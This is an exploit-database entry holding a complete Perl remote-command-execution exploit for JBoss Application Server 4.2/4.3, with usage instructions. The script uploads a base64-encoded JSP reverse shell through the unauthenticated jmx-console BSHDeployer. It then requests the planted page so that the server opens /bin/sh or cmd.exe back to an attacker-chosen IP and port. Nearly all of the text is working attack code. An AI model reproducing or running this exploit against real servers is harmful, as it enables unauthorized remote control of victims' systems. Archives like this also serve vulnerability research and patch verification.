JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution

EDB-ID:

16274


Author:

kingcope

Type:

webapps


Platform:

JSP

Date:

2011-03-04


#JBoss AS Remote Exploit
#by Kingcope
#####

use IO::Socket;
use LWP::UserAgent;
use URI::Escape;
use MIME::Base64;

sub usage {
	print "JBoss AS Remote Exploit\nby Kingcope\n\nusage: perl jboss.pl <target> <targetport> <yourip> <yourport> <win/lnx>\n";
	print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n";
	exit;
}

if ($#ARGV != 4) { usage; }

$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$com = $ARGV[4];

if ($com eq "lnx") {
	$comspec = "/bin/sh";
}

if ($com eq "win") {
	$comspec = "cmd.exe";
}

$|=1;

$jsp="
<%@
page import=\"java.lang.*, java.util.*, java.io.*, java.net.*\"
%>
			<%!
				static class StreamConnector extends Thread
				{
					InputStream is;
					OutputStream os;

					StreamConnector( InputStream is, OutputStream os )
					{
						this.is = is;
						this.os = os;
					}

					public void run()
					{
						BufferedReader in  = null;
						BufferedWriter out = null;
						try
						{
							in  = new BufferedReader( new InputStreamReader( this.is ) );
							out = new BufferedWriter( new OutputStreamWriter( this.os ) );
							char buffer[] = new char[8192];
							int length;
							while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
							{
								out.write( buffer, 0, length );
								out.flush();
							}
						} catch( Exception e ){}
						try
						{
							if( in != null )
								in.close();
							if( out != null )
								out.close();
						} catch( Exception e ){}
					}
				}
			%>
			<%
				try
				{
					Socket socket = new Socket( \"$myip\", $myport );
					Process process = Runtime.getRuntime().exec( \"$comspec\" );
					( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
					( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
				} catch( Exception e ) {}
			%>";

#print $jsp;exit;

srand(time());

sub randstr
{
	my $length_of_randomstring=shift;# the length of 
			 # the random string to generate

	my @chars=('a'..'z','A'..'Z','0'..'9','_');
	my $random_string;
	foreach (1..$length_of_randomstring) 
	{
		# rand @chars will generate a random 
		# number between 0 and scalar @chars
		$random_string.=$chars[rand @chars];
	}
	return $random_string;
}

$appbase = randstr(8);
$jspname = randstr(8);

print "APPBASE=$appbase\nJSPNAME=$jspname\n";

$bsh_script = 
qq{import java.io.FileOutputStream; 
import sun.misc.BASE64Decoder;

String val = "} . encode_base64($jsp, "") .  qq{";

BASE64Decoder decoder = new BASE64Decoder(); 
String jboss_home = System.getProperty("jboss.server.home.dir"); 
new File(jboss_home + "/deploy/} . $appbase . ".war" . qq{").mkdir(); 
byte[] byteval = decoder.decodeBuffer(val); 
String jsp_file = jboss_home + "/deploy/} . $appbase . ".war/" . $jspname . ".jsp" . qq{"; 
FileOutputStream fstream = new FileOutputStream(jsp_file); 
fstream.write(byteval); 
fstream.close(); };

# 
# UPLOAD 
# 
    
$params = 'action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=' . uri_escape($bsh_script) 
.
'&argType=java.lang.String&arg1=' . randstr(8) . '.bsh';

my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");

my $req = HTTP::Request->new(POST => "http://$host:$port/jmx-console/HtmlAdaptor");
  $req->content_type('application/x-www-form-urlencoded');
  $req->content($params);
   
  print "UPLOAD... ";
  my $res = $ua->request($req);

  if ($res->is_success) {
      print "SUCCESS\n";
      print "EXECUTE";
      sleep(5);
      $uri = '/' . $appbase . '/' . $jspname . '.jsp';
      
      for ($k=0;$k<10;$k++) {
      my $ua = LWP::UserAgent->new;
	  $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13");
	  my $req = HTTP::Request->new(GET => "http://$host:$port$uri");
	  my $res = $ua->request($req);

  		if ($res->is_success) {
	  		print "\nSUCCESS\n";
	  		exit;
  		} else {
	  		print ".";
#		        print $res->status_line."\n";

	  		sleep(5);
  		}
	  }
      print "UNSUCCESSFUL\n";
  }
  else {
	  print "UNSUCCESSFUL\n";
      print $res->status_line, "\n";
      exit;
  }